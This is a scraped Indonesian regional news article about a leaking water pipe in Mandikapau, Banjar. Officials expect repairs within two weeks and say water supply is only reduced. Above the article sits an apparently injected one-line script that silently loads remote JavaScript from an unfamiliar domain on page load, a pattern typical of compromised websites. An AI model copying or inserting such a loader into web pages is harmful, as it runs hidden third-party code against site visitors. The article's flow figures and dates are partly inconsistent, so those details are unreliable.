(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pipa Bocor di Mandikapau Harus Datangkan Ahli, BPAM Banjarbakula: Dua Pekan Selesai


KANALKALIMANTAN.COM, BANJARBARU – Perbaikan pipa di Desa Mandikapau, Kecamatan Karang Intan, Kabupaten Banjar ditarget selesai selama dua pekan.

Balai Pengelola Air Minum (BPAM) Banjarbakula Dinas PUPR Kalsel memastikan pendistribusian pasokan air baku ke PDAM tidak akan terhambat.

Disadur dari Media Center Kalsel, Kepala BPAM Banjarbakula, Nazaruddin Alhaida, Selasa (5/10/2021), mengatakan, progres di lapangan perbaikan pipa yang bocor masuk tahap penggalian dan harus mendatangkan tenaga ahli dari luar Kalsel.

Karena pipanya terbuat dari Korea, sehingga memerlukan waktu perkiraan dari pihak tenaga ahli sekitar dua pekan.

 

 

Kepala Balai Pengelolaan Air Minum Banjarbakula, Nazaruddin Alhaida. Foto: mckalsel/tgh

Baca juga : Akun Medsos Kadis Kominfo Diretas, Dr H Junaidi: Ini Kali Kedua 

“Jadi dipastikan dua minggu selesai dan pendistribusian air akan kembali normal ke masyarakat,” kata Nazaruddin.

Nazaruddin mengakui, kebocoran pipa Sistem Penyediaan Air Minum (SPAM) Banjarbakula tidak mempengaruhi pasokan pendistribusian air baku ke masyarakat.

Tetapi hanya menghambat sekitar 30 sampai 50 persen. Karena air curah yang di didistribusikan ke Intan Banjar sebanyak 200 sampai 290 meter kubik.

Namun, pada saat terjadi kebocoran rata-rata pendistribusian air sebesar 150 sampai 190 meter per detik. “Jadi ada selisihnya sekitar 80 meter per detik jadi tidak 100 persen berhenti distribusi,” ujarnya.

Oleh karena itu, masyarakat jangan khawatir pendistribusian air masih tetap jalan. Bahkan pada saat terjadi kebocoran pihaknya langsung ambil jalur ke irigasi.

Baca juga : Aksi #Saya Vs Oligarki, Berikut Tuntutan Demonstran!

“Kita sudah izin dan diizinkan mereka. Sehingga pasokan dari kami masih tetap berjalan cuma berkurang 50 persen,” pungkasnya.

Diberitakan sebelumnya, dari keterangan resmi PDAM Intan Banjar yang disampaikan kepada publik, Kamis (23/10/2021) lalu, terjadinya kebocoran pipa SPAM mengakibatkan terhentinya produksi dan suplai air baku kepada mereka.

Sehingga pihak PDAM Intan Banjar sendiri tidak dapat optimal mendistribusikan air bersih secara maksimasl kepada pelanggannya.

PDAM Intan Banjar mengklaim jumlah masyarakat terdampak yang totalnya mencapai puluhan ribu pelanggan. Mayoritas berada di Kota Banjarbaru, khususnya di Kecamatan Landasan Ulin, seperti di Jalan Golf, Jalan Kurnia, Jalan Kasturi, Jalan Sukamara, Jalan Sukamaju, dan Jalan Caraka. Wilayah terdampak lainnya di Kelurahan Landasan Ulin Utara, Landasan Ulin Timur, Landasan Ulin Tengah, hingga di kawasan Trikora.

Baca juga : Aksi #Saya VS Oligarki, Mahasiswa Tunggu Paman Birin di Gubernuran

Sekadar diketahui, kebocoran pipa SPAM Regional Banjarbakula milik Pemerintah Provinsi (Pemprov) Kalimantan Selatan. Kondisi itulah yang membuat pihak PDAM Intan Banjar mengaku tidak berwenang untuk menindaklanjuti kejadian ini.

“Kami dari PDAM hanya pendistribusi air bersih kepada pelanggan. Kebocoran pipa kali ini masalahnya ada diproduksi air baku, dan itu merupakan wewenang dari SPAM Regional Banjarbakula. Jadi bukan wewenang kami dan kalau secara distribusi sebenarnya kami mengklaim tidak ada masalah,” terang Direktur Teknik (Dirtek) PDAM Intan Banjar, Said Umar. (kanalkalimantan.com/mckalsel)

Reporter : mckalsel
Editor : kk


Desy Arfianty

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

8 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

8 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

8 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

8 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

8 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

9 jam ago

This website uses cookies.